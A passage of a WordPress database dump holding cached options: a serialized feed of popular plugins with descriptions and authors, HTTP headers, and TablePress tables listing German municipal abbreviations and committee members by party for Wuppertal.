Caoimh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Duplicate Post\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/duplicate-post/#post-2646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Dec 2007 17:40:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2646@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Clone posts and pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Lopo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Disable Comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/disable-comments/#post-26907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 May 2011 04:42:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"26907@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:134:\"Allows administrators to globally disable comments on their site. Comments can be disabled according to post type. Multisite friendly.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Samir Shah\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WP Multibyte Patch\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wp-multibyte-patch/#post-28395\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 14 Jul 2011 12:22:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"28395@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Multibyte functionality enhancement for the WordPress Japanese package.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"plugin-master\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Black Studio TinyMCE Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/plugins/black-studio-tinymce-widget/#post-31973\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Nov 2011 15:06:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"31973@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"The visual editor widget for Wordpress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Marco Chiesi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"21738@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"Protect your WordPress site by hiding vital areas of your site, protecting access to important files, preventing brute-force login attempts, detecting\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Chris Wiegman\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Page Builder by SiteOrigin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/siteorigin-panels/#post-51888\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Apr 2013 10:36:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"51888@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"Build responsive page layouts using the widgets you know and love using this simple drag and drop page builder.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Greg Priday\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Google Analytics Dashboard for WP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/plugins/google-analytics-dashboard-for-wp/#post-50539\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 10 Mar 2013 17:07:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"50539@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"Displays Google Analytics reports in your WordPress Dashboard. Inserts the latest Google Analytics tracking code in your pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alin Marcu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Meta Slider\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/ml-slider/#post-49521\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 14 Feb 2013 16:56:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"49521@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:145:\"Easy to use WordPress slider plugin. Create SEO optimised responsive slideshows with Nivo Slider, Flex Slider, Coin Slider and Responsive Slides.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Matcha Labs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"UpdraftPlus Backup and Restoration\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/updraftplus/#post-38058\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 May 2012 15:14:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"38058@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Backup and restoration made easy. Complete backups; manual or scheduled (backup to S3, Dropbox, Google Drive, Rackspace, FTP, SFTP, email + others).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Anderson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Clef Two-Factor Authentication\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/wpclef/#post-47509\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 27 Dec 2012 01:25:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"47509@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"Modern two-factor that people love to use: strong authentication without passwords or tokens; single sign on/off; magical user experience.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Dave Ross\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Duplicator\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/duplicator/#post-26607\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 May 2011 12:15:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"26607@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"Duplicate, clone, backup, move and transfer an entire site from one location to another.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Cory Lamle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:12:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 15 Dec 2015 21:54:06 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:7:\"expires\";s:29:\"Tue, 15 Dec 2015 22:04:51 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Tue, 15 Dec 2015 21:29:51 +0000\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20130911040210\";}','no'),(15658,'_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109','1450259646','no'),(15659,'_transient_feed_mod_b9388c83948825c1edaef0d856b7b109','1450216446','no'),(15660,'_transient_timeout_dash_88ae138922fe95674369b1cb3d215a2b','1450259646','no'),(15661,'_transient_dash_88ae138922fe95674369b1cb3d215a2b','
                                                                • WordPress 4.4 “Clifford” 8. December 2015
                                                                  Version 4.4 of WordPress, named “Clifford” in honor of jazz trumpeter Clifford Brown, is available for download or update in your WordPress dashboard. New features in 4.4 make your site more connected and responsive. Clifford also introduces a new default theme, Twenty Sixteen. Introducing Twenty Sixteen Our newest default theme, Twenty Sixteen, is a modern take […]
                                                                ','no'),(15667,'_transient_is_multi_author','0','yes'),(15668,'_site_transient_timeout_wporg_theme_feature_list','1450227551','yes'),(15669,'_site_transient_wporg_theme_feature_list','a:4:{s:6:\"Colors\";a:15:{i:0;s:5:\"black\";i:1;s:4:\"blue\";i:2;s:5:\"brown\";i:3;s:4:\"gray\";i:4;s:5:\"green\";i:5;s:6:\"orange\";i:6;s:4:\"pink\";i:7;s:6:\"purple\";i:8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:6:\"Layout\";a:9:{i:0;s:12:\"fixed-layout\";i:1;s:12:\"fluid-layout\";i:2;s:17:\"responsive-layout\";i:3;s:10:\"one-column\";i:4;s:11:\"two-columns\";i:5;s:13:\"three-columns\";i:6;s:12:\"four-columns\";i:7;s:12:\"left-sidebar\";i:8;s:13:\"right-sidebar\";}s:8:\"Features\";a:20:{i:0;s:19:\"accessibility-ready\";i:1;s:8:\"blavatar\";i:2;s:10:\"buddypress\";i:3;s:17:\"custom-background\";i:4;s:13:\"custom-colors\";i:5;s:13:\"custom-header\";i:6;s:11:\"custom-menu\";i:7;s:12:\"editor-style\";i:8;s:21:\"featured-image-header\";i:9;s:15:\"featured-images\";i:10;s:15:\"flexible-header\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}}','yes'),(18019,'_transient_timeout_tablepress_c_eccbc87e4b5ce2fe28308fd9f2a7baf3','1451406624','no'),(18020,'_transient_tablepress_c_eccbc87e4b5ce2fe28308fd9f2a7baf3','[\"tablepress_dd9245301c3fa54fb0c660ee8e9711e4\"]','no'),(18290,'_transient_timeout_tablepress_dd9245301c3fa54fb0c660ee8e9711e4','1451320224','no'),(18291,'_transient_tablepress_dd9245301c3fa54fb0c660ee8e9711e4','\n\n\n\n \n\n\n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n
                                                                AbkürzungBedeutung
                                                                GMWGebäudemanagement Wuppertal
                                                                StaWiBauAuschuss für Stadentwicklung, Wirtschaft und Bauen
                                                                FraSiFraktionssitzung
                                                                B-PlanBebauungsplan
                                                                BABetriebsauschuss
                                                                BVBezirksvertretung
                                                                HAHauptauschuss
                                                                RISRatsinformationssystem
                                                                GO NRWGemeineordnung Nordrhein-Westfalen
                                                                GO Geschäftsordnung
                                                                \n','no'),(18456,'_transient_timeout_tablepress_cc16fc95c9993d2623b0efc60e7c1eff','1451410605','no'),(18457,'_transient_tablepress_cc16fc95c9993d2623b0efc60e7c1eff','\n\n\n\n \n\n\n \n\n\n \n\n\n \n\n\n
                                                                Ralph Urban
                                                                Franz Rudolf Büning
                                                                Jonathan Benedict Hütter
                                                                Stefan Kottas
                                                                \n','no'),(18496,'_transient_timeout_jetpack_https_test','1451425489','no'),(18497,'_transient_jetpack_https_test','1','no'),(18574,'_transient_timeout_tablepress_96089c1146ab9922098c175f55bee839','1451465756','no'),(18575,'_transient_tablepress_96089c1146ab9922098c175f55bee839','\n\n\n\n \n\n\n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n
                                                                ParteiMitgliederStellvertreter
                                                                SPDDilek Engin, Volker VogelerMax Guder, Mascha Hausmanns
                                                                CDUMichael Hornung, Lutz MiddelbergEckhard Klesser, Frank Gottsmann
                                                                Bündnis 90 / Die GrünenPaul Yves RametteVerena Gabriel
                                                                Die LinkeDr. Dirk KrügerLudger Pilgram
                                                                FDPKarin van der MostGabriele Röder
